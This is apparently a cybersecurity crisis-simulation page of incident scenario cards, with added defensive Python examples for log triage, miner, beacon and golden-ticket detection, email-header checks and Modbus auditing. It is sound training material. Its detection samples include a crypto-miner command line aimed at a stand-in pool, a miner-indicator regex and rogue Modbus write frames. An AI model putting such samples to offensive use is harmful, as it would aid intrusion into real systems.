Crisis Simulations

WAR ROOM

Critical scenario analysis. From incident to resolution.

CRITICAL ID: op-blackout

OPERATION BLACKOUT

RANSOMWARE / CRISIS

>> SITUATION : A major hospital is paralyzed by Ryuk ransomware. Life support systems are threatened.

POTENTIAL IMPACT

Critical care stoppage, life-threatening risk to patients, $5M daily loss.

TACTICAL OBJECTIVES

  • [-] Isolate patient zero
  • [-] Restore vital services
  • [-] Negotiate (as a stalling tactic, with no intention to pay)
  • [-] Forensics

REQUIRED ARSENAL

Wireshark Volatility PowerShell Backup Strategy
MISSION STATUS: MISSION ACCOMPLISHED
HIGH ID: double-extortion

DOUBLE EXTORTION

RANSOMWARE / LEAK

>> SITUATION : The LockBit group threatens to publish 500GB of confidential legal data if the ransom is not paid.

POTENTIAL IMPACT

GDPR fines (up to 4% of global annual turnover), loss of client trust, lawsuits.

TACTICAL OBJECTIVES

  • [-] Assess data sensitivity
  • [-] Prepare crisis comms
  • [-] Close the initial access vector
  • [-] Notify authorities

REQUIRED ARSENAL

DLP Dark Web Monitor Legal Tech Crisis Comms
MISSION STATUS: DATA SECURED
CRITICAL ID: esxi-encrypt

VIRTUAL NIGHTMARE

INFRASTRUCTURE / ESXI

>> SITUATION : An unpatched OpenSLP flaw on the ESXi hosts gives the attacker code execution on the hypervisors; every production ESXi host is encrypted.

POTENTIAL IMPACT

Total Datacenter shutdown, 400 VMs offline, 72h service interruption.

TACTICAL OBJECTIVES

  • [-] Rebuild hypervisors
  • [-] Restore VMs from immutable backups
  • [-] Patch ESXi (and disable the SLP service where it is not needed)
  • [-] Harden SSH access

REQUIRED ARSENAL

VMware CLI Veeam Nmap Hardening Guide
MISSION STATUS: INFRA RESTORED
HIGH ID: cloud-leak

CELESTIAL LEAK

CLOUD / DATA LEAK

>> SITUATION : A misconfigured S3 bucket exposes 1TB of customer data (PII).

POTENTIAL IMPACT

Exposure of 1M customers, massive identity theft, record fine.

TACTICAL OBJECTIVES

  • [-] Lock the bucket (Block Public Access, strip public ACLs and bucket policies)
  • [-] Analyze access logs (CloudTrail S3 data events, server access logs)
  • [-] Identify the root cause in IaC
  • [-] Notify authorities

REQUIRED ARSENAL

AWS CloudTrail Terraform Prowler GDPR Compliance
MISSION STATUS: INCIDENT CLOSED
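Worked example for the CELESTIAL LEAK objectives, added here and not part of the original scenario card. It runs offline on constructed CloudTrail S3 data events and a constructed Terraform snippet: it isolates the unauthenticated requests, lists which objects actually left, and points at the IaC line that opened the bucket. The bucket name, IP addresses, object keys and Terraform resource names are all invented.

```python
import re
from collections import defaultdict

# Constructed CloudTrail S3 data-event records: the field names follow the
# CloudTrail record format, every value is made up for this example.
CLOUDTRAIL_SAMPLE = [
    {"eventTime": "2024-05-01T10:02:11Z", "eventName": "GetObject",
     "userIdentity": {"type": "AWSAccount", "principalId": "", "accountId": "anonymous"},
     "sourceIPAddress": "198.51.100.23",
     "requestParameters": {"bucketName": "acme-customer-exports", "key": "2024/customers-eu.csv"}},
    {"eventTime": "2024-05-01T10:02:40Z", "eventName": "GetObject",
     "userIdentity": {"type": "AWSAccount", "principalId": "", "accountId": "anonymous"},
     "sourceIPAddress": "198.51.100.23",
     "requestParameters": {"bucketName": "acme-customer-exports", "key": "2024/customers-us.csv"}},
    {"eventTime": "2024-05-01T10:05:03Z", "eventName": "GetObject",
     "userIdentity": {"type": "IAMUser", "accountId": "123456789012", "userName": "etl-batch"},
     "sourceIPAddress": "10.0.4.17",
     "requestParameters": {"bucketName": "acme-customer-exports", "key": "2024/customers-eu.csv"}},
    {"eventTime": "2024-05-01T10:07:55Z", "eventName": "ListObjects",
     "userIdentity": {"type": "AWSAccount", "principalId": "", "accountId": "anonymous"},
     "sourceIPAddress": "203.0.113.9",
     "requestParameters": {"bucketName": "acme-customer-exports"}},
]

# Constructed Terraform: one bucket with a public ACL and no public-access
# block, one bucket done right.
TERRAFORM_SAMPLE = '''
resource "aws_s3_bucket" "exports" {
  bucket = "acme-customer-exports"
  acl    = "public-read"
}

resource "aws_s3_bucket" "logs" {
  bucket = "acme-audit-logs"
}

resource "aws_s3_bucket_public_access_block" "logs" {
  bucket                  = aws_s3_bucket.logs.id
  block_public_acls       = true
  ignore_public_acls      = true
  block_public_policy     = true
  restrict_public_buckets = true
}
'''


def anonymous_access(events, bucket):
    """Map source IP -> [(eventName, key)] for unauthenticated requests on `bucket`.

    S3 logs requests made without credentials with accountId "anonymous";
    anything carrying a real account ID is an authenticated caller and is skipped.
    """
    hits = defaultdict(list)
    for ev in events:
        params = ev.get("requestParameters") or {}
        if params.get("bucketName") != bucket:
            continue
        if ev.get("userIdentity", {}).get("accountId") != "anonymous":
            continue
        hits[ev["sourceIPAddress"]].append((ev["eventName"], params.get("key")))
    return dict(hits)


def exposed_keys(events, bucket):
    """Objects that were actually downloaded anonymously: the breach scope."""
    keys = set()
    for requests in anonymous_access(events, bucket).values():
        keys.update(key for name, key in requests if name == "GetObject" and key)
    return sorted(keys)


def terraform_findings(hcl):
    """Root-cause check on the IaC: public ACLs and missing public-access blocks."""
    findings = []
    for m in re.finditer(r'resource\s+"aws_s3_bucket"\s+"(\w+)"\s*\{(.*?)\n\}', hcl, re.S):
        name, body = m.group(1), m.group(2)
        if re.search(r'\bacl\s*=\s*"public-read(-write)?"', body):
            findings.append(f"aws_s3_bucket.{name}: public ACL")
        guarded = re.search(
            r'aws_s3_bucket_public_access_block.*?bucket\s*=\s*aws_s3_bucket\.' + name + r'\.id',
            hcl, re.S)
        if not guarded:
            findings.append(f"aws_s3_bucket.{name}: no aws_s3_bucket_public_access_block")
    return findings


if __name__ == "__main__":
    bucket = "acme-customer-exports"
    for ip, reqs in anonymous_access(CLOUDTRAIL_SAMPLE, bucket).items():
        print(ip, reqs)
    print("exposed:", exposed_keys(CLOUDTRAIL_SAMPLE, bucket))
    print("iac:", terraform_findings(TERRAFORM_SAMPLE))
```

The lockdown itself is `aws s3api put-public-access-block --bucket acme-customer-exports --public-access-block-configuration BlockPublicAcls=true,IgnorePublicAcls=true,BlockPublicPolicy=true,RestrictPublicBuckets=true` (bucket name assumed). S3 data events are not recorded by CloudTrail unless they were switched on for the bucket beforehand; if they were not, the server access logs are the only record of who read what.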
MEDIUM ID: kube-hijack

KUBE MINER

KUBERNETES / CRYPTOJACKING

>> SITUATION : A production Kubernetes cluster is hijacked to mine Monero via a malicious container.

POTENTIAL IMPACT

Runaway cloud bill (autoscaling follows the miner's CPU), application performance degradation.

TACTICAL OBJECTIVES

  • [-] Identify malicious pod
  • [-] Trace source image
  • [-] Restrict RBAC rights
  • [-] Implement Network Policies

REQUIRED ARSENAL

Kubectl Falco Trivy Prometheus
MISSION STATUS: CLUSTER CLEANED
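Worked example for the KUBE MINER objectives, added here and not from the scenario card. It takes a constructed pod listing (the shape of `kubectl get pods -A -o json`) and constructed `kubectl top` figures, scores each pod on image origin, command line and CPU, and emits the NetworkPolicy that cuts egress from the affected namespace. The registry allow-list, pool hostname, pod names and CPU numbers are assumptions.

```python
import json
import re
from fnmatch import fnmatch

# Constructed pod inventory in the shape of `kubectl get pods -A -o json`
# (only the fields used here); names, images and numbers are invented.
PODS_SAMPLE = {"items": [
    {"metadata": {"namespace": "payments", "name": "api-7d9f"},
     "spec": {"containers": [
         {"name": "api", "image": "registry.internal/payments/api:3.2.1", "args": ["--port=8080"]}]}},
    {"metadata": {"namespace": "default", "name": "kube-proxy-helper"},
     "spec": {"containers": [
         {"name": "helper", "image": "docker.io/someuser/helper:latest",
          "args": ["-o", "stratum+tcp://pool.example:3333", "-u", "44AfWallet", "--donate-level=0"]}]}},
    {"metadata": {"namespace": "kube-system", "name": "coredns-5d"},
     "spec": {"containers": [
         {"name": "coredns", "image": "registry.k8s.io/coredns/coredns:v1.11.1"}]}},
]}

# CPU per pod in millicores, as `kubectl top pods -A` would report (constructed).
CPU_SAMPLE = {"payments/api-7d9f": 120, "default/kube-proxy-helper": 3900, "kube-system/coredns-5d": 8}

# Assumption: the organisation only pulls images from these registries.
ALLOWED_REGISTRIES = ("registry.internal/*", "registry.k8s.io/*")
MINER_INDICATORS = re.compile(r"stratum\+(tcp|ssl)://|xmrig|minerd|cryptonight|donate-level", re.I)


def suspicious_pods(pods, cpu_millicores, cpu_threshold=2000):
    """Score every pod on three independent signals and return the ones that hit.

    One signal alone is noise (a batch job is CPU-hungry, a dev image is
    unlisted); a pod that trips all three is a miner until proven otherwise.
    """
    findings = []
    for item in pods["items"]:
        ns, name = item["metadata"]["namespace"], item["metadata"]["name"]
        reasons = []
        for c in item["spec"]["containers"]:
            image = c["image"]
            if not any(fnmatch(image, pat) for pat in ALLOWED_REGISTRIES):
                reasons.append(f"image outside allow-list: {image}")
            cmdline = " ".join(c.get("command", []) + c.get("args", []))
            if MINER_INDICATORS.search(cmdline):
                reasons.append("miner indicator in command line")
        if cpu_millicores.get(f"{ns}/{name}", 0) >= cpu_threshold:
            reasons.append("sustained high CPU")
        if reasons:
            findings.append((f"{ns}/{name}", reasons))
    return findings


def default_deny_egress(namespace):
    """NetworkPolicy: no egress from `namespace` except DNS to kube-system.

    Applied to the compromised namespace this cuts the miner off from its
    pool immediately, without waiting for the pod to be deleted.
    """
    return {
        "apiVersion": "networking.k8s.io/v1",
        "kind": "NetworkPolicy",
        "metadata": {"name": "default-deny-egress", "namespace": namespace},
        "spec": {
            "podSelector": {},
            "policyTypes": ["Egress"],
            "egress": [{
                "to": [{"namespaceSelector": {
                    "matchLabels": {"kubernetes.io/metadata.name": "kube-system"}}}],
                "ports": [{"protocol": "UDP", "port": 53}, {"protocol": "TCP", "port": 53}],
            }],
        },
    }


if __name__ == "__main__":
    for pod, reasons in suspicious_pods(PODS_SAMPLE, CPU_SAMPLE):
        print(pod, "->", "; ".join(reasons))
    print(json.dumps(default_deny_egress("default"), indent=2))
```

Apply the policy with `kubectl apply -f` while the miner is still running, then record the image digest from `kubectl get pod <name> -o jsonpath='{.status.containerStatuses[*].imageID}'` for Trivy and the registry audit, and check what the pod's service account was allowed to do with `kubectl auth can-i --list --as=system:serviceaccount:<ns>:<sa>`; a service account that can create pods in another namespace is usually how the miner got there.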
CRITICAL ID: azure-ad-takeover

AZURE STORM

CLOUD IDENTITY

>> SITUATION : Compromise of an Azure AD (Microsoft Entra ID) Global Administrator account that has no MFA enforced.

POTENTIAL IMPACT

Total tenant takeover, resource deletion, data theft.

TACTICAL OBJECTIVES

  • [-] Revoke sessions and refresh tokens, reset credentials
  • [-] Enforce MFA for all privileged roles
  • [-] Audit sign-in logs
  • [-] Check for persistence (new app credentials, added admins, Conditional Access exclusions, mailbox rules)

REQUIRED ARSENAL

Microsoft Sentinel PowerShell MFA Conditional Access
MISSION STATUS: IDENTITY SECURED
HIGH ID: ghost-protocol

GHOST PROTOCOL

APT / THREAT HUNTING

>> SITUATION : Abnormal outbound traffic to an unknown IP. A stealthy attacker has been in the network for 6 months.

POTENTIAL IMPACT

Theft of strategic IP, long-term industrial espionage.

TACTICAL OBJECTIVES

  • [-] Trace lateral movement
  • [-] Identify persistence
  • [-] Cut exfiltration
  • [-] Complete eradication

REQUIRED ARSENAL

Splunk Sysmon Velociraptor YARA
MISSION STATUS: THREAT NEUTRALIZED
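Worked example for the beaconing hunt and the "Cut exfiltration" objective in GHOST PROTOCOL, added here and not from the page. It runs on a constructed connection log (the six fields a Sysmon Event ID 3 or a Zeek conn record would give after normalisation), separates a fixed-interval C2 beacon from ordinary browsing, then flags the destination receiving bulk uploads. Addresses, intervals and byte counts are invented.

```python
import statistics
from collections import defaultdict
from datetime import datetime, timedelta


def make_sample():
    """Constructed connection log: (time, src, dst, dst_port, bytes_out, bytes_in).

    One host beacons every 300 s with a few seconds of jitter, browses a CDN at
    irregular intervals, and pushes three large uploads to a second address
    after hours. All addresses and sizes are invented.
    """
    base = datetime(2024, 5, 1, 9, 0, 0)
    rows = []
    jitter = [0, 7, -4, 9, -8, 3, -6, 5, -2, 8, -9, 1]
    for i, j in enumerate(jitter):
        rows.append((base + timedelta(seconds=300 * i + j), "10.0.5.12", "203.0.113.45", 443, 512, 1400))
    for secs in (0, 12, 95, 100, 400, 415, 1300, 2100, 2105, 2700, 3010, 3300):
        rows.append((base + timedelta(seconds=secs), "10.0.5.12", "198.51.100.7", 443, 900, 60_000))
    for secs in (14 * 3600, 14 * 3600 + 120, 14 * 3600 + 300):
        rows.append((base + timedelta(seconds=secs), "10.0.5.12", "203.0.113.46", 443, 52_000_000, 2_000))
    return rows


def beacon_candidates(rows, min_connections=8, max_cv=0.15):
    """Destinations contacted at near-constant intervals.

    Human traffic is bursty; C2 implants sleep for a fixed period plus jitter.
    The coefficient of variation (stdev/mean) of the gaps between connections
    separates the two whatever interval the implant uses.
    """
    by_pair = defaultdict(list)
    for t, src, dst, port, _out, _in in rows:
        by_pair[(src, dst, port)].append(t)
    findings = []
    for pair, times in by_pair.items():
        if len(times) < min_connections:
            continue
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        mean = statistics.mean(gaps)
        if mean == 0:
            continue
        cv = statistics.pstdev(gaps) / mean
        if cv <= max_cv:
            findings.append((pair, round(mean), round(cv, 3)))
    return findings


def upload_heavy_destinations(rows, min_bytes_out=100_000_000, min_ratio=10):
    """Destinations that receive far more than they send back: the exfil channel."""
    totals = defaultdict(lambda: [0, 0])
    for _t, src, dst, _port, bytes_out, bytes_in in rows:
        totals[(src, dst)][0] += bytes_out
        totals[(src, dst)][1] += bytes_in
    return sorted((pair, out) for pair, (out, inn) in totals.items()
                  if out >= min_bytes_out and out >= min_ratio * max(inn, 1))


if __name__ == "__main__":
    rows = make_sample()
    print("beacons:", beacon_candidates(rows))
    print("uploads:", upload_heavy_destinations(rows))
```

Six months of dwell time means the beacon destination will show up in far more than twelve connections, so lower `max_cv` and raise `min_connections` when running this over real Sysmon or Zeek exports; the exfil host is often a different address from the beacon host, as constructed here, which is why the two checks are kept separate.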
EXTREME ID: supply-chain-compromise

DOMINO EFFECT

SUPPLY CHAIN

>> SITUATION : A software update from a trusted vendor contains a backdoor.

POTENTIAL IMPACT

Simultaneous compromise of entire app portfolio, total loss of control.

TACTICAL OBJECTIVES

  • [-] Identify IOCs
  • [-] Block C2s
  • [-] Audit privileged access
  • [-] Crisis communication

REQUIRED ARSENAL

EDR Network Forensics Threat Intel Crisis Comms
MISSION STATUS: ANALYSIS IN PROGRESS
CRITICAL ID: golden-ticket

GOLDEN TICKET

IDENTITY / AD

>> SITUATION : Compromise of the KRBTGT account hash. The attacker can forge TGTs (golden tickets) for any user, at will.

POTENTIAL IMPACT

Total and hard-to-detect persistence on the Windows domain; the forged tickets survive every password reset except KRBTGT's own.

TACTICAL OBJECTIVES

  • [-] Detect forged tickets
  • [-] Reset the KRBTGT password twice (wait for replication between the two resets)
  • [-] Rebuild trust
  • [-] Harden AD

REQUIRED ARSENAL

Mimikatz PingCastle AD Audit BloodHound
MISSION STATUS: DOMAIN SECURED
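Worked example for the GOLDEN TICKET objectives, added here and not the page's own material. It applies two detection heuristics to constructed Security-log events and computes when the second KRBTGT reset may happen. Event fields are reduced to what the checks need; the account list, hosts and times are invented, and the assumption that the domain has moved off RC4 is stated in the code.

```python
from datetime import datetime, timedelta

# Constructed Windows Security events, reduced to the fields used here.
# 4768 = TGT requested (Kerberos AS), 4769 = service ticket requested (TGS).
# "enc" is the ticket encryption type: 0x12 = AES256, 0x17 = RC4-HMAC.
EVENTS_SAMPLE = [
    {"id": 4768, "time": "2024-05-01T08:00:00", "account": "alice", "ip": "10.0.1.20", "enc": "0x12", "service": "krbtgt"},
    {"id": 4769, "time": "2024-05-01T08:00:05", "account": "alice", "ip": "10.0.1.20", "enc": "0x12", "service": "cifs/fs01"},
    {"id": 4769, "time": "2024-05-01T09:30:00", "account": "svc_backup", "ip": "10.0.7.99", "enc": "0x17", "service": "ldap/dc01"},
    {"id": 4769, "time": "2024-05-01T09:31:00", "account": "Administrator", "ip": "10.0.7.99", "enc": "0x17", "service": "cifs/dc01"},
]
KNOWN_ACCOUNTS = {"alice", "bob", "administrator"}   # assumption: exported from AD, lower-cased
TGT_MAX_LIFETIME = timedelta(hours=10)                # default domain Kerberos policy


def suspicious_tgs_requests(events, known_accounts, tgt_lifetime=TGT_MAX_LIFETIME):
    """Flag 4769 events that look like they were served from a forged TGT.

    A golden ticket is never issued by the KDC, so there is no matching 4768
    for that account from that host; Mimikatz defaults to RC4 and will happily
    name an account that does not exist. Assumption: the domain is AES-only,
    so an RC4 ticket is itself anomalous.
    """
    last_tgt = {}
    findings = []
    for ev in sorted(events, key=lambda e: e["time"]):
        t = datetime.fromisoformat(ev["time"])
        key = (ev["account"].lower(), ev["ip"])
        if ev["id"] == 4768:
            last_tgt[key] = t
            continue
        if ev["id"] != 4769:
            continue
        reasons = []
        if key[0] not in known_accounts:
            reasons.append("account does not exist in AD")
        issued = last_tgt.get(key)
        if issued is None or t - issued > tgt_lifetime:
            reasons.append("no TGT (4768) for this account/host within ticket lifetime")
        if ev["enc"] == "0x17":
            reasons.append("RC4 ticket in an AES-only domain")
        if reasons:
            findings.append((ev["account"], ev["ip"], ev["service"], reasons))
    return findings


def second_krbtgt_reset_time(first_reset_iso, replication_window=timedelta(hours=1),
                             tgt_lifetime=TGT_MAX_LIFETIME, active_incident=False):
    """Earliest sensible time for the second KRBTGT reset, as an ISO string.

    The KDC accepts tickets under the current and the previous KRBTGT key, so a
    single reset leaves the golden ticket valid. The second reset must come
    after replication has completed; outside an active incident it should also
    wait out the maximum TGT lifetime so legitimate tickets expire instead of
    failing. `replication_window` is an assumption about forest convergence time.
    """
    first = datetime.fromisoformat(first_reset_iso)
    wait = replication_window if active_incident else max(replication_window, tgt_lifetime)
    return (first + wait).isoformat()


if __name__ == "__main__":
    for account, ip, service, reasons in suspicious_tgs_requests(EVENTS_SAMPLE, KNOWN_ACCOUNTS):
        print(account, ip, service, "->", "; ".join(reasons))
    print("second reset no earlier than", second_krbtgt_reset_time("2024-05-01T08:00:00", active_incident=True))
```

Both heuristics need 4768 and 4769 collected from every domain controller: a TGT issued by one DC is routinely presented to another, so a per-DC view produces false "no TGT" hits. During an active incident the short gap is the right call and users simply re-authenticate; the trade-off is disruption, not safety.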
MEDIUM ID: ceo-fraud

THE FAKE CEO

BEC / DEEPFAKE

>> SITUATION : The CFO receives an urgent wire transfer order from the "CEO" (audio deepfake).

POTENTIAL IMPACT

Immediate financial loss of €500k, reputational damage.

TACTICAL OBJECTIVES

  • [-] Freeze the transfer (ask the bank to recall it)
  • [-] Analyze email headers
  • [-] Train execs
  • [-] Strengthen procedures (out-of-band callback, dual approval for wires)

REQUIRED ARSENAL

Email Gateway Awareness Banking Protocols
MISSION STATUS: FRAUD AVERTED
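Worked example for "Analyze email headers" in THE FAKE CEO, added here and not part of the scenario. It parses a constructed message with the standard library and reports the mismatches a spoofed executive request typically leaves behind: Reply-To and Return-Path pointing at a look-alike domain, no DKIM signature, a DMARC failure, and pressure language. The domains, addresses and the Authentication-Results line are all invented.

```python
import re
from email import message_from_string
from email.utils import parseaddr

INTERNAL_DOMAIN = "acme.example"   # assumption: the company's real mail domain

# Constructed message. The Authentication-Results header is what the receiving
# gateway would add; the look-alike domain acme-corp.co is invented.
RAW_SAMPLE = """\
Return-Path: <bounce@acme-corp.co>
Authentication-Results: mx.acme.example; spf=pass smtp.mailfrom=acme-corp.co; dkim=none; dmarc=fail header.from=acme.example
From: "Jane Doe (CEO)" <jane.doe@acme.example>
Reply-To: jane.doe@acme-corp.co
To: cfo@acme.example
Subject: URGENT wire - call me, I'm in a meeting
Date: Wed, 01 May 2024 16:02:00 +0000
Message-ID: <a1b2c3@acme-corp.co>

Please process the transfer I mentioned on the phone. Confidential.
"""


def header_findings(raw, internal_domain=INTERNAL_DOMAIN):
    """Return the list of red flags found in a raw RFC 5322 message."""
    msg = message_from_string(raw)
    findings = []

    def domain_of(header):
        return parseaddr(msg.get(header, ""))[1].rpartition("@")[2].lower()

    from_domain = domain_of("From")
    # A From that claims to be internal while replies and bounces go elsewhere
    # is the classic display-name / Reply-To spoof.
    if from_domain == internal_domain:
        for header in ("Reply-To", "Return-Path"):
            other = domain_of(header)
            if other and other != from_domain:
                findings.append(f"{header} goes to {other}, not {from_domain}")

    # SPF can pass for the attacker's own domain; what matters is DMARC
    # alignment with the visible From, and a missing DKIM signature.
    auth = msg.get("Authentication-Results", "").lower()
    for mech in ("spf", "dkim", "dmarc"):
        m = re.search(rf"\b{mech}=(\w+)", auth)
        if m and m.group(1) != "pass":
            findings.append(f"{mech}={m.group(1)}")

    text = (msg.get("Subject", "") + " " + msg.get_payload()).lower()
    pressure = [w for w in ("urgent", "wire", "confidential") if w in text]
    if pressure:
        findings.append("pressure language: " + ", ".join(pressure))
    return findings


if __name__ == "__main__":
    for line in header_findings(RAW_SAMPLE):
        print("-", line)
```

The headers only cover the email leg; the deepfake call leg is defeated by procedure, not tooling: call the CEO back on a number from the directory rather than one supplied in the message, and require a second approver for any "urgent" wire. The Subject line here is exactly the time pressure the attacker is counting on.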
MEDIUM ID: insider-threat

THE MOLE

INSIDER / DLP

>> SITUATION : Leak of confidential blueprints. Logs are clean. The culprit has legitimate access.

POTENTIAL IMPACT

Loss of competitive advantage, internal sabotage.

TACTICAL OBJECTIVES

  • [-] Correlate physical/logical access
  • [-] Behavioral analysis (UEBA)
  • [-] Steganalysis
  • [-] Legal case

REQUIRED ARSENAL

DLP UEBA StegSolve Log Analysis
MISSION STATUS: SUSPECT IDENTIFIED
LOW ID: hr-phishing

TRAPPED CV

PHISHING / MALWARE

>> SITUATION : HR department receives a CV containing a malicious macro.

POTENTIAL IMPACT

Infection of HR workstation, access to employee personal data.

TACTICAL OBJECTIVES

  • [-] Isolate workstation
  • [-] Analyze payload
  • [-] Sweep the network for spread
  • [-] Anti-phishing training

REQUIRED ARSENAL

Sandbox Antivirus Phishing Sim Education
MISSION STATUS: WORKSTATION CLEANED
EXTREME ID: industrial-sabotage

GHOST FACTORY

ICS / SCADA

>> SITUATION : PLCs in a water treatment plant receive erratic commands.

POTENTIAL IMPACT

Major health risk, environmental pollution, production halt.

TACTICAL OBJECTIVES

  • [-] Emergency air gap (disconnect OT from the IT network)
  • [-] Switch to manual operation
  • [-] Analyze Modbus traffic
  • [-] Identify entry point

REQUIRED ARSENAL

Claroty Nozomi Safety Protocols Segmentation
MISSION STATUS: PHYSICAL SAFETY ENSURED
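Worked example for "Analyze Modbus traffic" in GHOST FACTORY, added here and not the page's own material. It decodes Modbus/TCP frames from constructed bytes (MBAP header plus PDU) and raises an alert for write function codes from any host other than the SCADA server, or for a setpoint written outside its safe envelope. The HMI address, the rogue host and the safe register range are assumptions.

```python
import struct

# Function codes that change plant state.
WRITE_FUNCTIONS = {5: "Write Single Coil", 6: "Write Single Register",
                   15: "Write Multiple Coils", 16: "Write Multiple Registers"}
AUTHORISED_WRITERS = {"10.10.1.5"}          # assumption: the SCADA/HMI server
SAFE_RANGES = {0x0010: (0, 1000)}           # assumption: holding register 0x10 is a pump setpoint

# Constructed capture: (source IP, raw Modbus/TCP payload).
SAMPLE_CAPTURE = [
    ("10.10.1.5",  bytes.fromhex("00010000000601030000000a")),            # HMI reads 10 registers
    ("10.10.1.77", bytes.fromhex("00020000000601060010ffff")),            # rogue host writes 0xFFFF to reg 0x10
    ("10.10.1.5",  bytes.fromhex("00030000000b01100020000204006400c8")),  # HMI writes two registers
    ("10.10.1.77", bytes.fromhex("00040000000601050005ff00")),            # rogue host forces coil 5 ON
]


def parse_modbus_tcp(payload):
    """Decode the MBAP header and the parts of the PDU needed for policy checks.

    MBAP: transaction id (2), protocol id (2, always 0), length (2, bytes that
    follow), unit id (1); then the function code and its data.
    """
    if len(payload) < 8:
        raise ValueError("short frame")
    tid, pid, length, unit, fc = struct.unpack(">HHHBB", payload[:8])
    if pid != 0:
        raise ValueError("protocol id is not Modbus")
    if length != len(payload) - 6:
        raise ValueError("MBAP length does not match frame")
    data = payload[8:]
    frame = {"tid": tid, "unit": unit, "fc": fc & 0x7F, "exception": bool(fc & 0x80)}
    code = frame["fc"]
    if code in (1, 2, 3, 4) and len(data) >= 4:            # reads: start address, quantity
        frame["address"], frame["quantity"] = struct.unpack(">HH", data[:4])
    elif code in (5, 6) and len(data) >= 4:                # single writes: address, value
        frame["address"], frame["value"] = struct.unpack(">HH", data[:4])
    elif code in (15, 16) and len(data) >= 5:              # multiple writes: address, quantity, byte count, values
        frame["address"], frame["quantity"], nbytes = struct.unpack(">HHB", data[:5])
        frame["values"] = data[5:5 + nbytes]
    return frame


def audit_capture(capture, authorised=AUTHORISED_WRITERS, safe_ranges=SAFE_RANGES):
    """Alert on writes from unexpected hosts and on out-of-envelope setpoints."""
    alerts = []
    for src, payload in capture:
        frame = parse_modbus_tcp(payload)
        if frame["fc"] not in WRITE_FUNCTIONS:
            continue
        reasons = []
        if src not in authorised:
            reasons.append(f"write from unauthorised host {src}")
        bounds = safe_ranges.get(frame.get("address"))
        if bounds and "value" in frame and not bounds[0] <= frame["value"] <= bounds[1]:
            reasons.append(f"value {frame['value']} outside safe range {bounds}")
        if reasons:
            alerts.append((src, frame["fc"], WRITE_FUNCTIONS[frame["fc"]], reasons))
    return alerts


if __name__ == "__main__":
    for src, fc, name, reasons in audit_capture(SAMPLE_CAPTURE):
        print(f"{src} fc={fc} ({name}): " + "; ".join(reasons))
```

In a real plant the frames arrive from a SPAN port into Zeek's Modbus analyzer or a Claroty/Nozomi sensor; the value of the check is the policy behind it, which only the process engineers can supply: which hosts may write at all, and which register values are physically safe. Modbus has no authentication, so the source address is the only thing to check against, and it is spoofable; the policy is a detection, not a control.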
MEDIUM ID: iot-botnet

THE SWARM

DDOS / IOT

>> SITUATION : 500 Gbps DDoS attack originating from compromised IoT cameras.

POTENTIAL IMPACT

E-commerce site offline, revenue loss (€100k/hour).

TACTICAL OBJECTIVES

  • [-] Activate Scrubbing Center
  • [-] Block attack signatures
  • [-] Rate limiting
  • [-] Keep the service reachable (degraded mode)

REQUIRED ARSENAL

Cloudflare WAF Traffic Analysis Load Balancing
MISSION STATUS: SERVICE RESTORED
MEDIUM ID: smart-building-hack

HAUNTED BUILDING

IOT / BUILDING

>> SITUATION : Takeover of HVAC and elevator systems at HQ.

POTENTIAL IMPACT

Building evacuation, business stoppage, physical risk.

TACTICAL OBJECTIVES

  • [-] Isolate BMS network
  • [-] Reset controllers
  • [-] Patch IoT flaws
  • [-] Segment network

REQUIRED ARSENAL

Shodan Network Seg Firmware Update Physical Security
MISSION STATUS: BUILDING SECURED
HIGH ID: ai-poisoning

COGNITIVE POISON

AI SECURITY

>> SITUATION : Injection of biased data into the training dataset of a trading AI.

POTENTIAL IMPACT

Erroneous financial decisions, massive automated losses.

TACTICAL OBJECTIVES

  • [-] Audit dataset
  • [-] Retrain model
  • [-] Validate data sources
  • [-] Drift monitoring

REQUIRED ARSENAL

Adversarial ML Data Validation Model Ops Audit
MISSION STATUS: MODEL CORRECTED
FUTURE ID: quantum-decrypt

Q-DAY PREP

QUANTUM / CRYPTO

>> SITUATION : Interception of encrypted traffic today for future quantum decryption (Harvest Now, Decrypt Later).

POTENTIAL IMPACT

Future compromise of long-term secrets (diplomatic, industrial).

TACTICAL OBJECTIVES

  • [-] Inventory cryptography in use
  • [-] Migrate key exchange and signatures to PQC (ML-KEM, ML-DSA)
  • [-] Increase symmetric key sizes (AES-256; Grover halves effective strength)
  • [-] Build in crypto-agility

REQUIRED ARSENAL

PQC Algorithms Crypto Inventory Key Management Strategy
MISSION STATUS: IN PREPARATION
HIGH ID: deepfake-video

OPTICAL ILLUSION

DEEPFAKE / DISINFO

>> SITUATION : Release of a fake video of the CEO announcing imminent bankruptcy.

POTENTIAL IMPACT

Stock price crash (-20%), shareholder panic.

TACTICAL OBJECTIVES

  • [-] Authenticate video
  • [-] Rapid official denial
  • [-] Report to platforms
  • [-] Video forensics

REQUIRED ARSENAL

Deepware Media Forensics PR Crisis Legal
MISSION STATUS: DENIAL PUBLISHED
HIGH ID: mobile-spyware

PEGASUS

MOBILE / ESPIONAGE

>> SITUATION : A journalist's phone heats up. Data exfiltrated to suspicious servers.

POTENTIAL IMPACT

Compromise of sources, physical danger to the journalist.

TACTICAL OBJECTIVES

  • [-] Mobile forensics
  • [-] Detect IOCs
  • [-] Secure comms
  • [-] Protect sources

REQUIRED ARSENAL

MVT Network Analysis Encryption Burner Phones
MISSION STATUS: DEVICE ANALYZED
LOW ID: wifi-pineapple

ROGUE PINEAPPLE

WIFI / MITM

>> SITUATION : A malicious Wi-Fi access point intercepts employee traffic in the lobby.

POTENTIAL IMPACT

Credential theft, interception of unencrypted documents.

TACTICAL OBJECTIVES

  • [-] Locate rogue AP
  • [-] Deauth clients from the rogue AP (check legality first; deauth frames can count as jamming)
  • [-] Force VPN
  • [-] Deploy WIPS

REQUIRED ARSENAL

WiFi Analyzer WIPS VPN Physical Search
MISSION STATUS: AP DISABLED
MEDIUM ID: sql-injection

LETHAL INJECTION

WEB / SQLI

>> SITUATION : Extraction of customer database via a vulnerable contact form.

POTENTIAL IMPACT

Theft of 100k customer records, data leak.

TACTICAL OBJECTIVES

  • [-] Patch the code (parameterized queries)
  • [-] Validate inputs (defense in depth, not a substitute for parameterization)
  • [-] WAF virtual patch while the fix ships
  • [-] Rotate DB credentials and review DB privileges

REQUIRED ARSENAL

SQLMap WAF Code Review Prepared Statements
MISSION STATUS: FLAW PATCHED
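Worked example for LETHAL INJECTION, added here and not the page's own code: the vulnerable ticket-lookup query beside its parameterized replacement, run against an in-memory SQLite database so the UNION payload can be seen to dump the customers table from one and fail against the other. The table layout and rows are constructed.

```python
import sqlite3


def make_db():
    """Constructed schema and rows standing in for the site's database."""
    conn = sqlite3.connect(":memory:")
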